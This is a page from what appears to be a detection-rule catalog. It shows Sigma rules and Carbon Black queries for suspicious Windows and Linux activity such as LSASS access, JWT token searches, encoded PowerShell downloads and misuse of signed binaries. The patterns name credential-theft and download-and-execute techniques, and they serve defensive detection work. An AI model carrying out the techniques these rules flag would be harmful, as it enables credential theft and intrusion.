Tool
EDR / XDR
VMware Carbon Black
1,440 rules · Sigma detections in VMware Carbon Black syntax
The same Sigma detection corpus, machine-rendered into VMware Carbon Black query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 3,646 rules (.zip, 1.2 MB)
Every VMware Carbon Black query in this view, packaged to deploy.
Filter by techniquepick techniques from the ATT&CK matrix
Reconnaissance12
Resource Development10
Initial Access10
Execution30
Persistence42
Privilege Escalation20
Stealth79
Defense Impairment32
Credential Access35
Discovery33
Lateral Movement16
Collection20
Command and Control24
Exfiltration10
Impact18
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
◈
Detection rules
50 shown of 1,440
medium
Moderate
Medium FP
Potentially Suspicious Compression Tool Parameters
Detects potentially suspicious command line arguments of common data compression tools
view Sigma YAML
title: Potentially Suspicious Compression Tool Parameters
id: 27a72a60-7e5e-47b1-9d17-909c9abafdcd
status: test
description: Detects potentially suspicious command line arguments of common data compression tools
references:
- https://twitter.com/SBousseaden/status/1184067445612535811
author: Florian Roth (Nextron Systems), Samir Bousseaden
date: 2019-10-15
modified: 2023-08-29
tags:
- attack.collection
- attack.t1560.001
- detection.threat-hunting
logsource:
category: process_creation
product: windows
detection:
selection:
OriginalFileName:
- '7z*.exe'
- '*rar.exe'
- '*Command*Line*RAR*'
CommandLine|contains:
- ' -p'
- ' -ta'
- ' -tb'
- ' -sdel'
- ' -dw'
- ' -hp'
filter_main_generic:
ParentImage|contains:
- ':\Program Files\'
- ':\Program Files (x86)\'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Potentially Suspicious DMP/HDMP File Creation
Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
view Sigma YAML
title: Potentially Suspicious DMP/HDMP File Creation
id: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c
related:
- id: 3a525307-d100-48ae-b3b9-0964699d7f97
type: similar
status: test
description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
references:
- https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-09-07
tags:
- attack.stealth
logsource:
category: file_event
product: windows
detection:
selection:
Image|endswith:
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
TargetFilename|endswith:
- '.dmp'
- '.dump'
- '.hdmp'
condition: selection
falsepositives:
- Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.
level: medium
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious Desktop Background Change Using Reg.EXE
Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
This is a common technique used by malware to change the desktop background to a ransom note or other image.
view Sigma YAML
title: Potentially Suspicious Desktop Background Change Using Reg.EXE
id: 8cbc9475-8d05-4e27-9c32-df960716c701
related:
- id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae
type: similar
status: test
description: |
Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
This is a common technique used by malware to change the desktop background to a ransom note or other image.
references:
- https://www.attackiq.com/2023/09/20/emulating-rhysida/
- https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/
- https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html
- https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI
author: Stephen Lincoln @slincoln-aiq (AttackIQ)
date: 2023-12-21
tags:
- attack.persistence
- attack.impact
- attack.defense-impairment
- attack.t1112
- attack.t1491.001
logsource:
product: windows
category: process_creation
detection:
# TODO: Improve this to also focus on variation using PowerShell and other CLI tools
selection_reg_img:
- Image|endswith: '\reg.exe'
- OriginalFileName: 'reg.exe'
selection_reg_flag:
CommandLine|contains: 'add'
selection_keys:
CommandLine|contains:
- 'Control Panel\Desktop'
- 'CurrentVersion\Policies\ActiveDesktop'
- 'CurrentVersion\Policies\System'
selection_cli_reg_1:
CommandLine|contains|all:
- '/v NoChangingWallpaper'
- '/d 1' # Prevent changing desktop background
selection_cli_reg_2:
CommandLine|contains|all:
- '/v Wallpaper'
- '/t REG_SZ'
selection_cli_reg_3:
CommandLine|contains|all:
- '/v WallpaperStyle'
- '/d 2' # Stretch
condition: all of selection_reg_* and selection_keys and 1 of selection_cli_reg_*
falsepositives:
- Administrative scripts that change the desktop background to a company logo or other image.
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious Desktop Background Change Via Registry
Detects registry value settings that would replace the user's desktop background.
This is a common technique used by malware to change the desktop background to a ransom note or other image.
view Sigma YAML
title: Potentially Suspicious Desktop Background Change Via Registry
id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae
related:
- id: 8cbc9475-8d05-4e27-9c32-df960716c701
type: similar
status: test
description: |
Detects registry value settings that would replace the user's desktop background.
This is a common technique used by malware to change the desktop background to a ransom note or other image.
references:
- https://www.attackiq.com/2023/09/20/emulating-rhysida/
- https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/
- https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html
- https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI
author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
date: 2023-12-21
modified: 2025-10-17
tags:
- attack.persistence
- attack.impact
- attack.defense-impairment
- attack.t1112
- attack.t1491.001
logsource:
product: windows
category: registry_set
detection:
selection_keys:
TargetObject|contains:
- 'Control Panel\Desktop'
- 'CurrentVersion\Policies\ActiveDesktop'
- 'CurrentVersion\Policies\System'
selection_values_1:
TargetObject|endswith: 'NoChangingWallpaper'
Details: 'DWORD (0x00000001)' # Prevent changing desktop background
selection_values_2:
TargetObject|endswith: '\Wallpaper'
selection_values_3:
TargetObject|endswith: '\WallpaperStyle'
Details: '2' # Stretch
filter_main_svchost:
# Note: Excluding GPO changes
Image|endswith: '\svchost.exe'
filter_main_empty:
TargetObject|endswith: '\Control Panel\Desktop\Wallpaper'
Details: '(Empty)'
filter_main_explorer:
# Normally Explorer.exe is the process that changes the desktop background
Image|endswith: 'C:\Windows\Explorer.EXE'
filter_optional_ec2launch:
Image:
- 'C:\Program Files\Amazon\EC2Launch\EC2Launch.exe'
- 'C:\Program Files (x86)\Amazon\EC2Launch\EC2Launch.exe'
TargetObject|endswith: '\Control Panel\Desktop\Wallpaper'
condition: selection_keys and 1 of selection_values_* and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Administrative scripts that change the desktop background to a company logo or other image.
level: medium
Convert to SIEM query
medium
Strong
High FP
Potentially Suspicious Electron Application CommandLine
Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
view Sigma YAML
title: Potentially Suspicious Electron Application CommandLine
id: 378a05d8-963c-46c9-bcce-13c7657eac99
related:
- id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8
type: similar
status: test
description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
references:
- https://positive.security/blog/ms-officecmd-rce
- https://lolbas-project.github.io/lolbas/Binaries/Teams/
- https://lolbas-project.github.io/lolbas/Binaries/Msedge/
- https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/
- https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
- https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2023-09-05
modified: 2023-11-09
tags:
- attack.execution
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
# Add more electron based app to the list
- '\chrome.exe'
- '\code.exe'
- '\discord.exe'
- '\GitHubDesktop.exe'
- '\keybase.exe'
- '\msedge_proxy.exe'
- '\msedge.exe'
- '\msedgewebview2.exe'
- '\msteams.exe'
- '\slack.exe'
- '\Teams.exe'
- OriginalFileName:
# Add more electron based app to the list
- 'chrome.exe'
- 'code.exe'
- 'discord.exe'
- 'GitHubDesktop.exe'
- 'keybase.exe'
- 'msedge_proxy.exe'
- 'msedge.exe'
- 'msedgewebview2.exe'
- 'msteams.exe'
- 'slack.exe'
- 'Teams.exe'
selection_cli:
CommandLine|contains:
- '--browser-subprocess-path'
- '--gpu-launcher'
- '--renderer-cmd-prefix'
- '--utility-cmd-prefix'
condition: all of selection_*
falsepositives:
- Legitimate usage for debugging purposes
# Increase the level once FP rate is known better (see status)
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
view Sigma YAML
title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf
related:
- id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f
type: derived
status: test
description: |
Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
references:
- http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
- https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a
- https://www.group-ib.com/blog/apt41-world-tour-2021/
- https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1
- http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
- https://ptsecurity.com/research/pt-esc-threat-intelligence/striking-panda-attacks-apt31-today
- https://www.cybertriage.com/artifact/terminalservices_remoteconnectionmanager_log/
- https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/
author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
date: 2022-09-09
modified: 2025-12-02
tags:
- attack.credential-access
- attack.discovery
- attack.t1552
- attack.t1087
logsource:
category: process_creation
product: windows
detection:
selection_wmi:
CommandLine|contains|all:
- 'Select'
- 'Win32_NTLogEvent'
selection_wevtutil_img:
- Image|endswith: '\wevtutil.exe'
- OriginalFileName: 'wevtutil.exe'
selection_wevtutil_cli:
CommandLine|contains:
- ' qe '
- ' query-events '
selection_wmic_img:
- Image|endswith: '\wmic.exe'
- OriginalFileName: 'wmic.exe'
selection_wmic_cli:
CommandLine|contains: ' ntevent'
selection_cmdlet:
CommandLine|contains:
- 'Get-WinEvent '
- 'get-eventlog '
selection_logs_name:
CommandLine|contains:
# Note: Add more event log channels that are interesting for attackers
- 'Microsoft-Windows-PowerShell'
- 'Microsoft-Windows-Security-Auditing'
- 'Microsoft-Windows-TerminalServices-LocalSessionManager'
- 'Microsoft-Windows-TerminalServices-RemoteConnectionManager'
- 'Microsoft-Windows-Windows Defender'
- 'PowerShellCore'
- 'Security'
- 'Windows PowerShell'
selection_logs_eid:
CommandLine|contains:
# Note: We use the "?" to account for both a single and a double quote
# Note: Please add additional interesting event IDs
# Note: As this only focuses on EIDs and we know EIDs are not unique across providers. Rare FPs might occur with legit queries to EIDs from different providers.
# This covers EID 4624 and 4628 from Security Log
- '-InstanceId 462?'
- '.eventid -eq 462?'
- '.ID -eq 462?'
- 'EventCode=?462?'
- 'EventIdentifier=?462?'
- 'System[EventID=462?]'
# This covers EID 4778 from Security Log
- '-InstanceId 4778'
- '.eventid -eq 4778'
- '.ID -eq 4778'
- 'EventCode=?4778?'
- 'EventIdentifier=?4778?'
- 'System[EventID=4778]'
# This covers EID 25 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log
- '-InstanceId 25'
- '.eventid -eq 25'
- '.ID -eq 25'
- 'EventCode=?25?'
- 'EventIdentifier=?25?'
- 'System[EventID=25]'
# This covers EID 1149 from Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational log
- '-InstanceId 1149'
- '.eventid -eq 1149'
- '.ID -eq 1149'
- 'EventCode=?1149?'
- 'EventIdentifier=?1149?'
- 'System[EventID=1149]'
# This covers EID 21 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log
- '-InstanceId 21'
- '.eventid -eq 21'
- '.ID -eq 21'
- 'EventCode=?21?'
- 'EventIdentifier=?21?'
- 'System[EventID=21]'
# This covers EID 22 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log
- '-InstanceId 22'
- '.eventid -eq 22'
- '.ID -eq 22'
- 'EventCode=?22?'
- 'EventIdentifier=?22?'
- 'System[EventID=22]'
condition: 1 of selection_logs_* and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)
falsepositives:
- Legitimate usage of the utility by administrators to query the event log
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/info.yml
Convert to SIEM query
medium
Moderate
High FP
Potentially Suspicious Execution From Tmp Folder
Detects a potentially suspicious execution of a process located in the '/tmp/' folder
view Sigma YAML
title: Potentially Suspicious Execution From Tmp Folder
id: 312b42b1-bded-4441-8b58-163a3af58775
status: test
description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
modified: 2025-08-05
tags:
- attack.stealth
- attack.t1036
logsource:
product: linux
category: process_creation
detection:
selection:
Image|startswith: '/tmp/'
filter_optional_nextcloud:
Image|endswith: '/usr/bin/nextcloud'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Potentially Suspicious Execution Of PDQDeployRunner
Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
view Sigma YAML
title: Potentially Suspicious Execution Of PDQDeployRunner
id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184
related:
- id: d679950c-abb7-43a6-80fb-2a480c4fc450
type: similar
status: test
description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
references:
- https://twitter.com/malmoeb/status/1550483085472432128
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-22
modified: 2024-05-02
tags:
- attack.execution
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|contains: '\PDQDeployRunner-'
selection_child:
# Improve this section by adding other suspicious processes, commandlines or paths
- Image|endswith:
# If you use any of the following processes legitimately comment them out
- '\bash.exe'
- '\certutil.exe'
- '\cmd.exe'
- '\csc.exe'
- '\cscript.exe'
- '\dllhost.exe'
- '\mshta.exe'
- '\msiexec.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\scriptrunner.exe'
- '\wmic.exe'
- '\wscript.exe'
- '\wsl.exe'
- Image|contains:
- ':\ProgramData\'
- ':\Users\Public\'
- ':\Windows\TEMP\'
- '\AppData\Local\Temp'
- CommandLine|contains:
- ' -decode '
- ' -enc '
- ' -encodedcommand '
- ' -w hidden'
- 'DownloadString'
- 'FromBase64String'
- 'http'
- 'iex '
- 'Invoke-'
condition: all of selection_*
falsepositives:
- Legitimate use of the PDQDeploy tool to execute these commands
level: medium
Convert to SIEM query
medium
Moderate
High FP
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
view Sigma YAML
title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
id: cc368ed0-2411-45dc-a222-510ace303cb2
related:
- id: e9f8f8cc-07cc-4e81-b724-f387db9175e4
type: derived
status: test
description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
references:
- https://www.fortiguard.com/threat-signal-report/4718?s=09
- https://lolbas-project.github.io/lolbas/Binaries/Regasm/
- https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-25
modified: 2023-02-13
tags:
- attack.stealth
- attack.t1218.009
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\Regsvcs.exe'
- '\Regasm.exe'
- OriginalFileName:
- 'RegSvcs.exe'
- 'RegAsm.exe'
selection_dir:
CommandLine|contains:
# Note: Add more potentially suspicious directories
- '\AppData\Local\Temp\'
- '\Microsoft\Windows\Start Menu\Programs\Startup\'
- '\PerfLogs\'
- '\Users\Public\'
- '\Windows\Temp\'
# - '\Desktop\'
# - '\Downloads\'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
view Sigma YAML
title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
id: e9f8f8cc-07cc-4e81-b724-f387db9175e4
related:
- id: cc368ed0-2411-45dc-a222-510ace303cb2
type: derived
status: test
description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
references:
- https://www.fortiguard.com/threat-signal-report/4718?s=09
- https://lolbas-project.github.io/lolbas/Binaries/Regasm/
- https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-13
tags:
- attack.stealth
- attack.t1218.009
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\Regsvcs.exe'
- '\Regasm.exe'
- OriginalFileName:
- 'RegSvcs.exe'
- 'RegAsm.exe'
selection_extension:
CommandLine|contains:
# Note: Add more potentially uncommon extensions
- '.dat'
- '.gif'
- '.jpeg'
- '.jpg'
- '.png'
- '.txt'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Potentially Suspicious File Creation by OpenEDR's ITSMService
Detects the creation of potentially suspicious files by OpenEDR's ITSMService process.
The ITSMService is responsible for remote management operations and can create files on the system through the Process Explorer or file management features.
While legitimate for IT operations, creation of executable or script files could indicate unauthorized file uploads, data staging, or malicious file deployment.
view Sigma YAML
title: Potentially Suspicious File Creation by OpenEDR's ITSMService
id: 9e4b7d3a-6f2c-4e9a-8d1b-3c5e7a9f2b4d
status: experimental
description: |
Detects the creation of potentially suspicious files by OpenEDR's ITSMService process.
The ITSMService is responsible for remote management operations and can create files on the system through the Process Explorer or file management features.
While legitimate for IT operations, creation of executable or script files could indicate unauthorized file uploads, data staging, or malicious file deployment.
author: '@kostastsale'
date: 2026-02-19
references:
- https://kostas-ts.medium.com/detecting-abuse-of-openedrs-permissive-edr-trial-a-security-researcher-s-perspective-fc55bf53972c
tags:
- attack.command-and-control
- attack.t1105
- attack.lateral-movement
- attack.t1570
- attack.t1219
logsource:
product: windows
category: file_event
detection:
selection_process:
Image|endswith: '\COMODO\Endpoint Manager\ITSMService.exe'
selection_suspicious_extensions:
TargetFilename|endswith:
- '.7z'
- '.bat'
- '.cmd'
- '.com'
- '.dll'
- '.exe'
- '.hta'
- '.js'
- '.pif'
- '.ps1'
- '.rar'
- '.scr'
- '.vbe'
- '.vbs'
- '.zip'
condition: all of selection_*
falsepositives:
- Legitimate OpenEDR file management operations
- Authorized remote file uploads by IT administrators
- Software deployment through OpenEDR console
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious GrantedAccess Flags On LSASS
Detects process access requests to LSASS process with potentially suspicious access flags
view Sigma YAML
title: Potentially Suspicious GrantedAccess Flags On LSASS
id: a18dd26b-6450-46de-8c91-9659150cf088
related:
- id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d
type: similar
status: test
description: Detects process access requests to LSASS process with potentially suspicious access flags
references:
- https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
- https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow
- https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
- https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community
date: 2021-11-22
modified: 2023-11-29
tags:
- attack.credential-access
- attack.t1003.001
- attack.s0002
logsource:
category: process_access
product: windows
detection:
selection_target:
TargetImage|endswith: '\lsass.exe'
selection_access:
- GrantedAccess|endswith:
# - '10' # covered in rule 678dfc63-fefb-47a5-a04c-26bcf8cc9f65
- '30'
- '50'
- '70'
- '90'
- 'B0'
- 'D0'
- 'F0'
- '18'
- '38'
- '58'
- '78'
- '98'
- 'B8'
- 'D8'
- 'F8'
- '1A'
- '3A'
- '5A'
- '7A'
- '9A'
- 'BA'
- 'DA'
- 'FA'
- '0x14C2' # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c
- GrantedAccess|startswith:
- '0x100000'
- '0x1418' # car.2019-04-004
- '0x1438' # car.2019-04-004
- '0x143a' # car.2019-04-004
- '0x1f0fff'
- '0x1f1fff'
- '0x1f2fff'
- '0x1f3fff'
- '0x40'
# - '0x1000' # minimum access requirements to query basic info from service
# - '0x1010' # car.2019-04-004
# - '0x1400'
# - '0x1410' # car.2019-04-004 # Covered by 678dfc63-fefb-47a5-a04c-26bcf8cc9f65
filter_main_generic:
# When using this rule. Remove this filter and replace it by the path of the specific AV you use
SourceImage|contains:
- ':\Program Files (x86)\'
- ':\Program Files\'
- ':\Windows\System32\'
- ':\Windows\SysWOW64\'
filter_optional_malwarebytes:
SourceImage|endswith: ':\ProgramData\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe'
filter_optional_vscode:
SourceImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe'
filter_main_windefend_1:
SourceImage|contains: ':\ProgramData\Microsoft\Windows Defender\'
SourceImage|endswith: '\MsMpEng.exe'
filter_main_windefend_2:
CallTrace|contains|all:
- '|?:\ProgramData\Microsoft\Windows Defender\Definition Updates\{'
- '}\mpengine.dll+'
GrantedAccess: '0x1418'
filter_main_windefend_3:
CallTrace|contains:
- '|c:\program files\windows defender\mprtp.dll'
- '|c:\program files\windows defender\MpClient.dll'
filter_optional_vmwaretools:
SourceImage|contains: ':\ProgramData\VMware\VMware Tools\'
SourceImage|endswith: '\vmtoolsd.exe'
filter_optional_sysinternals_process_explorer:
SourceImage|endswith:
- '\PROCEXP64.EXE'
- '\PROCEXP.EXE'
GrantedAccess: '0x40'
filter_optional_mbami:
SourceImage|endswith: '\MBAMInstallerService.exe'
GrantedAccess: '0x40'
filter_optional_nextron:
SourceImage|endswith:
- '\aurora-agent-64.exe'
- '\aurora-agent.exe'
- '\thor.exe'
- '\thor64.exe'
GrantedAccess: '0x40'
filter_main_explorer:
SourceImage|endswith: '\explorer.exe'
GrantedAccess: '0x401'
filter_optional_sysinternals_handle:
SourceImage|endswith:
- '\handle.exe'
- '\handle64.exe'
GrantedAccess: '0x40'
filter_optional_webex:
SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe'
GrantedAccess: '0x401'
filter_optional_steam_apps:
SourceImage|contains: '\SteamLibrary\steamapps\'
condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Legitimate software such as AV and EDR
level: medium
Convert to SIEM query
medium
Moderate
High FP
Potentially Suspicious Inline JavaScript Execution via NodeJS Binary
Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.
view Sigma YAML
title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary
id: 8537c866-072e-460d-bfff-aaf39cbd73d3
status: experimental
description: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.
references:
- https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/
author: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-04-21
tags:
- attack.execution
- attack.t1059.007
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\node.exe'
- OriginalFileName: 'node.exe'
- Product: 'Node.js'
selection_cmd:
CommandLine|contains|all:
- 'http'
- 'execSync'
- 'spawn'
- 'fs'
- 'path'
- 'zlib'
condition: all of selection_*
falsepositives:
- Legitimate scripts using Node.js with these modules
level: medium
Convert to SIEM query
medium
Moderate
High FP
Potentially Suspicious JWT Token Search Via CLI
Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.
Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
view Sigma YAML
title: Potentially Suspicious JWT Token Search Via CLI
id: 6d3a3952-6530-44a3-8554-cf17c116c615
status: test
description: |
Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.
Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
references:
- https://mrd0x.com/stealing-tokens-from-office-applications/
- https://www.scip.ch/en/?labs.20240523
author: Nasreddine Bencherchali (Nextron Systems), kagebunsher
date: 2022-10-25
modified: 2025-10-21
tags:
- attack.credential-access
- attack.t1528
- attack.t1552.001
logsource:
category: process_creation
product: windows
detection:
selection_tools:
CommandLine|contains:
- 'find '
- 'find.exe'
- 'findstr'
- 'select-string '
- 'strings'
selection_jwt_string:
CommandLine|contains:
- 'eyJ0eXAiOi' # {"typ":
- 'eyJhbGciOi' # {"alg":
- ' eyJ0eX'
- ' "eyJ0eX"'
- " 'eyJ0eX'"
- ' eyJhbG'
- ' "eyJhbG"'
- " 'eyJhbG'"
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious NTFS Symlink Behavior Modification
Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks.
view Sigma YAML
title: Potentially Suspicious NTFS Symlink Behavior Modification
id: c0b2768a-dd06-4671-8339-b16ca8d1f27f
status: test
description: |
Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks.
references:
- https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware
- https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior
- https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/
author: frack113, The DFIR Report
date: 2022-03-02
modified: 2025-11-13
tags:
- attack.execution
- attack.defense-impairment
- attack.t1059
- attack.t1222.001
logsource:
category: process_creation
product: windows
detection:
selection_img_proxy:
# Note: Example command observed: cmd.exe /c "fsutil behaviour set SymlinkEvaluation"
- Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'Cmd.Exe'
- 'PowerShell.EXE'
